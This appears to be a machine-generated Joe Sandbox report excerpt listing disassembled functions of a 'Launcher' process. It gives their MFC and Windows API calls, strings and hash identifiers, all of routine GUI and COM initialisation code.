                                                                                                    • Instruction Fuzzy Hash: 0DF0FF70500645DBCB55EF90C851F9EB7B2BF20714F00C85CB49E2A152EBB0AA58DB55
                                                                                                    APIs
                                                                                                    • __EH_prolog3.LIBCMT ref: 00679420
                                                                                                    • #540.MFC42U(00000004,0067B222,?,?,TypeLib,?), ref: 00679433
                                                                                                    • #540.MFC42U(00000004,0067B222,?,?,TypeLib,?), ref: 0067943F
                                                                                                    • #540.MFC42U(00000004,0067B222,?,?,TypeLib,?), ref: 0067944B
                                                                                                    • #858.MFC42U(?,00000004,0067B222,?,?,TypeLib,?), ref: 0067945A
                                                                                                    • #861.MFC42U(006621A0,?,00000004,0067B222,?,?,TypeLib,?), ref: 00679467
                                                                                                    • #858.MFC42U(?,006621A0,?,00000004,0067B222,?,?,TypeLib,?), ref: 00679472
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: #540$#858$#861H_prolog3
                                                                                                    • String ID:
                                                                                                    • API String ID: 117671327-0
                                                                                                    • Opcode ID: 687c76d73d3417b41feae90283eb8f86cbd1081d75279b78f9d14572ea026991
                                                                                                    • Instruction ID: 4bf0e6aeabb9f5c0f6dae382f675d2a480375bda7cfc998df1b5b8157f74c4e0
                                                                                                    • Opcode Fuzzy Hash: 687c76d73d3417b41feae90283eb8f86cbd1081d75279b78f9d14572ea026991
                                                                                                    • Instruction Fuzzy Hash: 4DF01D70500605DBDB95EF90C852F9EB7B2BF24714F00C85CB59E1B192DBB0AA48DB55
                                                                                                    APIs
                                                                                                    • #1662.MFC42U ref: 00672B02
                                                                                                    • #5596.MFC42U ref: 00672B2D
                                                                                                    • #5596.MFC42U ref: 00672B45
                                                                                                    • #861.MFC42U(006621A0,00000000,0000000D), ref: 00672BB6
                                                                                                    • #6325.MFC42U(00000000,00000004,00000000,006621A0,00000000,0000000D), ref: 00672BC4
                                                                                                    • #2644.MFC42U ref: 00672C14
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: #5596$#1662#2644#6325#861
                                                                                                    • String ID:
                                                                                                    • API String ID: 4171677465-0
                                                                                                    • Opcode ID: 620c7e516fd65367e10c65aa90c45766d26080ad41eecce18e0a0da2853443ba
                                                                                                    • Instruction ID: 76c368a7cdcca9d9289412f63b758cb8b9e63e3523dd271f985bd062aa4cc931
                                                                                                    • Opcode Fuzzy Hash: 620c7e516fd65367e10c65aa90c45766d26080ad41eecce18e0a0da2853443ba
                                                                                                    • Instruction Fuzzy Hash: B7411274E01115EFCB44EFA4C996BADB7B3AF84700F1081A8E506AB3A2DB719E44CB55
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: #5596$#1662#2644#6325#861
                                                                                                    • String ID:
                                                                                                    • API String ID: 4171677465-0
                                                                                                    • Opcode ID: 05836b20f555f738263719d7426e71bb3fa429354667b217796015a509e5a5c3
                                                                                                    • Instruction ID: a8ac43f615924f77d910dabad801033b9190706e838ba237700196da0444c587
                                                                                                    • Opcode Fuzzy Hash: 05836b20f555f738263719d7426e71bb3fa429354667b217796015a509e5a5c3
                                                                                                    • Instruction Fuzzy Hash: 7631EF74B01115EFCB44FFA4C956AADB7B3AF85700F1081A8E506AB3A2DF71AE00DB15
                                                                                                    APIs
                                                                                                    • #6211.MFC42U(?,0000130B,?,?,0066D5AA,00000000), ref: 0066E5BE
                                                                                                    • #6211.MFC42U(?,0000130B,?,?,0066D5AA,00000000), ref: 0066E5E8
                                                                                                    • #6211.MFC42U(?,0000130B,?,?,0066D5AA,00000000), ref: 0066E60B
                                                                                                    • #6211.MFC42U(?,0000130B,?,?,0066D5AA,00000000), ref: 0066E62E
                                                                                                    • #6211.MFC42U(?,0000130B,?,?,0066D5AA,00000000), ref: 0066E651
                                                                                                    • RedrawWindow.USER32(?,00000000,00000000,00000105,?,0000130B,?,?,0066D5AA,00000000), ref: 0066E669
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: #6211$RedrawWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 4151937776-0
                                                                                                    • Opcode ID: 3819623af347c2aa6cc64f1d3ca2a6baf3de7f2775b8dfc471835c95eac956ee
                                                                                                    • Instruction ID: 04723af43d667fae9bba84110db5342b76896c76789fd52f84254edb95f6fe73
                                                                                                    • Opcode Fuzzy Hash: 3819623af347c2aa6cc64f1d3ca2a6baf3de7f2775b8dfc471835c95eac956ee
                                                                                                    • Instruction Fuzzy Hash: FC21C334010605FACF318E22DC08DD77BBBEBA6728F11C01DF46A94164D6339954DF65
                                                                                                    APIs
                                                                                                    • free.MSVCRT ref: 0067CD5F
                                                                                                    • free.MSVCRT ref: 0067CD71
                                                                                                    • free.MSVCRT ref: 0067CD83
                                                                                                    • free.MSVCRT ref: 0067CD95
                                                                                                    • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,00000000,?,0067CE02,00000000,00000000,00000000), ref: 0067CDB7
                                                                                                    • GetLastError.KERNEL32(00000000), ref: 0067CDC2
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: free$DescriptorErrorInitializeLastSecurity
                                                                                                    • String ID:
                                                                                                    • API String ID: 1417453991-0
                                                                                                    • Opcode ID: d94bb867720f58329f355e81ed2701baecd25869abbfc4e6e03b76e8a7b1ab99
                                                                                                    • Instruction ID: 5b17e3013c1220d6445a51679d29ebcb6d8633afe275e6055a0c68d153985a26
                                                                                                    • Opcode Fuzzy Hash: d94bb867720f58329f355e81ed2701baecd25869abbfc4e6e03b76e8a7b1ab99
                                                                                                    • Instruction Fuzzy Hash: 12114936504B43DFD7315F65E884992BBF3EF44365322E93EE19E86660CB719880DB44
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: #1165ExtractIconQueryValuelstrcpylstrlenwcsrchr
                                                                                                    • String ID:
                                                                                                    • API String ID: 2919050075-0
                                                                                                    • Opcode ID: cce7081e9aee1ab3f4a39c4d05db5f9d34535e21f6d9d836014b7c8fa5f30b58
                                                                                                    • Instruction ID: 070cc991ac695742bf68b382d22cf545c3ae92496fe60f75fdc37869f8ad8cda
                                                                                                    • Opcode Fuzzy Hash: cce7081e9aee1ab3f4a39c4d05db5f9d34535e21f6d9d836014b7c8fa5f30b58
                                                                                                    • Instruction Fuzzy Hash: A9215E76A00219ABCB20EF65DC49EDA77B9EF48310F108699E519D7191EB709A84CB60
                                                                                                    APIs
                                                                                                    • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 0066F167
                                                                                                    • #3087.MFC42U(00001FA5,00000000), ref: 0066F17D
                                                                                                    • #2634.MFC42U(00001FA5,00000000), ref: 0066F184
                                                                                                    • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 0066F192
                                                                                                    • #3087.MFC42U(0000009C,00000000), ref: 0066F1A8
                                                                                                    • #2634.MFC42U(0000009C,00000000), ref: 0066F1AF
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: #2634#3087MessageSend
                                                                                                    • String ID:
                                                                                                    • API String ID: 496076185-0
                                                                                                    • Opcode ID: 76595ffe9099f070349ee0f71c4705c0befa1551ddadd513382bae55bde18c5f
                                                                                                    • Instruction ID: 7567a6a384f472a71e3960ad6adffe689e4825a8b846a18d9525826956dc0721
                                                                                                    • Opcode Fuzzy Hash: 76595ffe9099f070349ee0f71c4705c0befa1551ddadd513382bae55bde18c5f
                                                                                                    • Instruction Fuzzy Hash: C0F08CB27002503BFB282B719C9AE2F29AEDBC8B61F41442DF10AC61A0DE764D008229
                                                                                                    APIs
                                                                                                    • #693.MFC42U(?,0066D810,?,0066D83D), ref: 00670A85
                                                                                                    • #609.MFC42U(?,0066D810,?,0066D83D), ref: 00670A90
                                                                                                    • #609.MFC42U(?,0066D810,?,0066D83D), ref: 00670A9B
                                                                                                    • #609.MFC42U(?,0066D810,?,0066D83D), ref: 00670AA6
                                                                                                    • #609.MFC42U(?,0066D810,?,0066D83D), ref: 00670AAE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: #609$#693
                                                                                                    • String ID:
                                                                                                    • API String ID: 2192965535-0
                                                                                                    • Opcode ID: 60f7d3018abdac02b8671d4dd0671386abc17e2cff5b668c45e68ad431324955
                                                                                                    • Instruction ID: 50de0332a4cd7bca0b74815ee1ee35e8ccfd5b9c3e75594e91eadd9b939da034
                                                                                                    • Opcode Fuzzy Hash: 60f7d3018abdac02b8671d4dd0671386abc17e2cff5b668c45e68ad431324955
                                                                                                    • Instruction Fuzzy Hash: 33E09A350046129AC2B4EB30C4515E9B7B3AF58360F41866EA0AF03561FF612A4DCB54
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: wsprintf
                                                                                                    • String ID: %s ($%08lX)$range: %s ($%08lX)$severity: %s, facility: %s ($%08lX)
                                                                                                    • API String ID: 2111968516-3060768123
                                                                                                    • Opcode ID: cfe3091bb6db1c629be7736e4737d6c0292392d9362b99c15321011dc4e092db
                                                                                                    • Instruction ID: f54bb70537dc83906a2758f915acb9bc72d72e5f04db90543307c88eaedb40e4
                                                                                                    • Opcode Fuzzy Hash: cfe3091bb6db1c629be7736e4737d6c0292392d9362b99c15321011dc4e092db
                                                                                                    • Instruction Fuzzy Hash: B6F0E232A42130769A1027544C06CBB3A6FCD02B4174A8521FD4DF7342DA509E0183FA
                                                                                                    APIs
                                                                                                    • #1143.MFC42U(00000093,0000000E,00000093), ref: 0066B31D
                                                                                                    • LoadIconW.USER32(00000000,00000093), ref: 0066B323
                                                                                                    • #1165.MFC42U(?,?,CCCCC300), ref: 0066B32B
                                                                                                      • Part of subcall function 0066B421: #1172.MFC42U(?,0066B338), ref: 0066B424
                                                                                                    • ShellAboutW.SHELL32(?,?,Developed By Charlie KindelMichael Nelson, and Michael Antonio,00000000), ref: 0066B34B
                                                                                                    Strings
                                                                                                    • Developed By Charlie KindelMichael Nelson, and Michael Antonio, xrefs: 0066B344
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: #1143#1165#1172AboutIconLoadShell
                                                                                                    • String ID: Developed By Charlie KindelMichael Nelson, and Michael Antonio
                                                                                                    • API String ID: 29937196-3714244911
                                                                                                    • Opcode ID: 15c1cd1f21982704206d771b7b1ea73d4936808adf38f92b5343abdbf08d6679
                                                                                                    • Instruction ID: 6462423c21650393e2aca0c080946195d95b401005e3efd44cabc5ef36c9441c
                                                                                                    • Opcode Fuzzy Hash: 15c1cd1f21982704206d771b7b1ea73d4936808adf38f92b5343abdbf08d6679
                                                                                                    • Instruction Fuzzy Hash: 6DE04F71600211BBD7642771ED09E6B2A6FDF81760B061969B406E7292DB65C8418664
                                                                                                    APIs
                                                                                                    • __EH_prolog3.LIBCMT ref: 0067B467
                                                                                                    • #489.MFC42U(0000008D,00000000,00000008,0066ED96,00000090), ref: 0067B478
                                                                                                    • #567.MFC42U(0000008D,00000000,00000008,0066ED96,00000090), ref: 0067B492
                                                                                                    • #567.MFC42U(0000008D,00000000,00000008,0066ED96,00000090), ref: 0067B4AD
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: #567$#489H_prolog3
                                                                                                    • String ID: Pg
                                                                                                    • API String ID: 3691984168-1016263835
                                                                                                    • Opcode ID: b567e63a74ef1e148fbd149fd06d3cf736593673282688619e21ce24be4afd35
                                                                                                    • Instruction ID: a491b9d16ae92731b3f0d24f19fbb79e853ab3ef5ab1e2e82a9c39b3923462e1
                                                                                                    • Opcode Fuzzy Hash: b567e63a74ef1e148fbd149fd06d3cf736593673282688619e21ce24be4afd35
                                                                                                    • Instruction Fuzzy Hash: 6CF0A771A00616DBDB44AFD4840679CBB72BF59700F90805DE1887F381CBB51E05C7D6
                                                                                                    APIs
                                                                                                    • LoadLibraryW.KERNEL32(OLE32.DLL,?,0066E204,?,?,?), ref: 0067DB2B
                                                                                                    • GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 0067DB3D
                                                                                                    • FreeLibrary.KERNEL32(00000000,?,0066E204,?,?,?), ref: 0067DB52
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                                    • String ID: CoInitializeEx$OLE32.DLL
                                                                                                    • API String ID: 145871493-3669712014
                                                                                                    • Opcode ID: 2fb3eec536413e64536ab517c285a5c4986604bbde6481c4e4aac93853c0f6dc
                                                                                                    • Instruction ID: 32863122394adc9730ed06e0e1c8b7966adf70e26f3233ceae8485425d57fea1
                                                                                                    • Opcode Fuzzy Hash: 2fb3eec536413e64536ab517c285a5c4986604bbde6481c4e4aac93853c0f6dc
                                                                                                    • Instruction Fuzzy Hash: 01E04F71501631BFDB204B24EC0C7D736ABAF51F23B022304E555A23A0CB748648C765
                                                                                                    APIs
                                                                                                    • #2371.MFC42U ref: 00670917
                                                                                                    • #6193.MFC42U(00000000,?,?,00000000,00000000,00000015,?), ref: 0067096E
                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 00670939
                                                                                                      • Part of subcall function 0066C8A6: ScreenToClient.USER32(?,?), ref: 0066C8B7
                                                                                                      • Part of subcall function 0066C8A6: ScreenToClient.USER32(?,?), ref: 0066C8C4
                                                                                                      • Part of subcall function 0066C8A6: #3133.MFC42U(?,?,?,0066C46E,?), ref: 0066C8CC
                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 0067098D
                                                                                                    • #6193.MFC42U(00000000,00000004,?,?,?,00000014,?), ref: 006709BF
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: #6193ClientRectScreenWindow$#2371#3133
                                                                                                    • String ID:
                                                                                                    • API String ID: 3329109363-0
                                                                                                    • Opcode ID: f425cbd376bfb564e95b1b18d37baac14866b134a474e17c36b88ec2078df2b7
                                                                                                    • Instruction ID: f15dd316014b7075f9330a195d7ec871defaffcf0a65abf3a10df9574df9e419
                                                                                                    • Opcode Fuzzy Hash: f425cbd376bfb564e95b1b18d37baac14866b134a474e17c36b88ec2078df2b7
                                                                                                    • Instruction Fuzzy Hash: 54213271600609ABDB14DB78CD45FEFB7BAEF88724F044219B515E72D1DB30AA05C764
                                                                                                    APIs
                                                                                                    • #2371.MFC42U ref: 0066C3E7
                                                                                                    • #6193.MFC42U(00000000,?,?,00000000,00000000,00000015,?), ref: 0066C43E
                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 0066C409
                                                                                                      • Part of subcall function 0066C8A6: ScreenToClient.USER32(?,?), ref: 0066C8B7
                                                                                                      • Part of subcall function 0066C8A6: ScreenToClient.USER32(?,?), ref: 0066C8C4
                                                                                                      • Part of subcall function 0066C8A6: #3133.MFC42U(?,?,?,0066C46E,?), ref: 0066C8CC
                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 0066C45D
                                                                                                    • #6193.MFC42U(00000000,00000004,?,?,?,00000014,?), ref: 0066C48F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: #6193ClientRectScreenWindow$#2371#3133
                                                                                                    • String ID:
                                                                                                    • API String ID: 3329109363-0
                                                                                                    • Opcode ID: d192334f8b6257e16e21245e3cf245f05b2fc51eb5ed159f3c4e2380f6f7f689
                                                                                                    • Instruction ID: 1e3b47e0f264204bd66522c40e2f91ff61b8796cad0cbe85a10df78a7c617a40
                                                                                                    • Opcode Fuzzy Hash: d192334f8b6257e16e21245e3cf245f05b2fc51eb5ed159f3c4e2380f6f7f689
                                                                                                    • Instruction Fuzzy Hash: 97215E71600609ABDB14DF78CD45FFEB7BAEF88724F144218B525A72C1DB30AA05CB64
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CountTick$#4692FreeLibrariesUnused
                                                                                                    • String ID:
                                                                                                    • API String ID: 1635327766-0
                                                                                                    • Opcode ID: 5513f9297d14c8faa1082b09f3025441100a4184a2f901cdf1a634087424054b
                                                                                                    • Instruction ID: 0eb26afb3bf95f68d8400921f2e9191ffbc2b577692ccce25788e04d31156fa0
                                                                                                    • Opcode Fuzzy Hash: 5513f9297d14c8faa1082b09f3025441100a4184a2f901cdf1a634087424054b
                                                                                                    • Instruction Fuzzy Hash: B201D631500111EFC720EF68F84D869B7A7AB95B20720732AE908C3721EF7059C18B59
                                                                                                    APIs
                                                                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 00670B85
                                                                                                    • SetCursor.USER32(00000000,?,?,?,?,0066DF45), ref: 00670B8C
                                                                                                      • Part of subcall function 00670BBB: SendMessageW.USER32(?,00001009,00000000,00000000), ref: 00670BE4
                                                                                                      • Part of subcall function 00670BBB: #2634.MFC42U(00000000,?,80000000,?,LaunchPermission), ref: 00670C33
                                                                                                      • Part of subcall function 00670BBB: SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00670C46
                                                                                                      • Part of subcall function 00670BBB: SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00670C57
                                                                                                    • #6330.MFC42U(00000000,?,?,?,?,0066DF45), ref: 00670B9C
                                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 00670BA7
                                                                                                    • SetCursor.USER32(00000000,?,?,?,?,0066DF45), ref: 00670BAE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Cursor$MessageSend$Load$#2634#6330
                                                                                                    • String ID:
                                                                                                    • API String ID: 3859525188-0
                                                                                                    • Opcode ID: 3f99d207ce92b9a7be2304851dedc4dc6a1ec7efaaca9f72ad1b418bdee8a242
                                                                                                    • Instruction ID: ce7ad15ebc7e57fa61a3d1308df8be67722bcd1d88ece9fc0dce9ad82baa50d5
                                                                                                    • Opcode Fuzzy Hash: 3f99d207ce92b9a7be2304851dedc4dc6a1ec7efaaca9f72ad1b418bdee8a242
                                                                                                    • Instruction Fuzzy Hash: FDF0A032601314BB87016FE59C4DD9B7B5EEF877513010526FA169B142CFB99809C7E4
                                                                                                    APIs
                                                                                                    • #810.MFC42U(?,0066D83D), ref: 0066D7B3
                                                                                                    • #795.MFC42U(?,0066D83D), ref: 0066D7BE
                                                                                                    • #795.MFC42U(?,0066D83D), ref: 0066D7C9
                                                                                                    • #795.MFC42U(?,0066D83D), ref: 0066D7D4
                                                                                                    • #804.MFC42U(?,0066D83D), ref: 0066D7DF
                                                                                                      • Part of subcall function 006794F7: #810.MFC42U(?,0066D7EF,?,0066D83D), ref: 00679505
                                                                                                      • Part of subcall function 0066C9F5: #800.MFC42U(?,0066CA4D), ref: 0066CA06
                                                                                                      • Part of subcall function 0066C9F5: #800.MFC42U(?,0066CA4D), ref: 0066CA11
                                                                                                      • Part of subcall function 0066C9F5: #656.MFC42U(?,0066CA4D), ref: 0066CA1C
                                                                                                      • Part of subcall function 0066C9F5: #609.MFC42U(?,0066CA4D), ref: 0066CA24
                                                                                                      • Part of subcall function 0066F46C: #800.MFC42U(?,0066D805,?,0066D83D), ref: 0066F47D
                                                                                                      • Part of subcall function 0066F46C: #800.MFC42U(?,0066D805,?,0066D83D), ref: 0066F488
                                                                                                      • Part of subcall function 0066F46C: #800.MFC42U(?,0066D805,?,0066D83D), ref: 0066F493
                                                                                                      • Part of subcall function 0066F46C: #800.MFC42U(?,0066D805,?,0066D83D), ref: 0066F49E
                                                                                                      • Part of subcall function 0066F46C: #616.MFC42U(?,0066D805,?,0066D83D), ref: 0066F4A9
                                                                                                      • Part of subcall function 0066F46C: #656.MFC42U(?,0066D805,?,0066D83D), ref: 0066F4B4
                                                                                                      • Part of subcall function 0066F46C: #609.MFC42U(?,0066D805,?,0066D83D), ref: 0066F4BF
                                                                                                      • Part of subcall function 0066F46C: #609.MFC42U(?,0066D805,?,0066D83D), ref: 0066F4CA
                                                                                                      • Part of subcall function 0066F46C: #804.MFC42U(?,0066D805,?,0066D83D), ref: 0066F4D2
                                                                                                      • Part of subcall function 00670A74: #693.MFC42U(?,0066D810,?,0066D83D), ref: 00670A85
